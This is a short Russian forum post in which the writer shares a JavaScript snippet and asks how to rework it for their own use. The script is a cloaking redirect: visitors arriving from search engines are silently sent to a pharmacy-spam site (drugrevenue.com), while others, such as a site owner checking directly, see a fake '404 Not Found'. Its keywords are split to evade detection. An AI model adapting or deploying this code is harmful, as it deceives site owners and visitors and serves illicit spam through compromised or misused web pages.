ребята вот например есть код
<script>
function R(){
var Ref=document.referrer;
if (Ref.indexOf('.google.')!=-1 || Ref.indexOf('.bing.')!=-1 || Ref.indexOf('.yahoo.')!=-1 || Ref.indexOf('.aol.')!=-1 || Ref.indexOf('.ask.')!=-1 || Ref.indexOf('.altavista.')!=-1 || Ref.indexOf('.bing.')!=-1 )
{ document.write('<script language="javascript">docu'+'ment.location="http://ССЫЛКАНАШОПОТdrugrevenue.com"</s'+'cript>')}
else {
document.write('<h1>404 Not Found</h1>');
}
}
R();
</script>
как его переделать под мои нужды?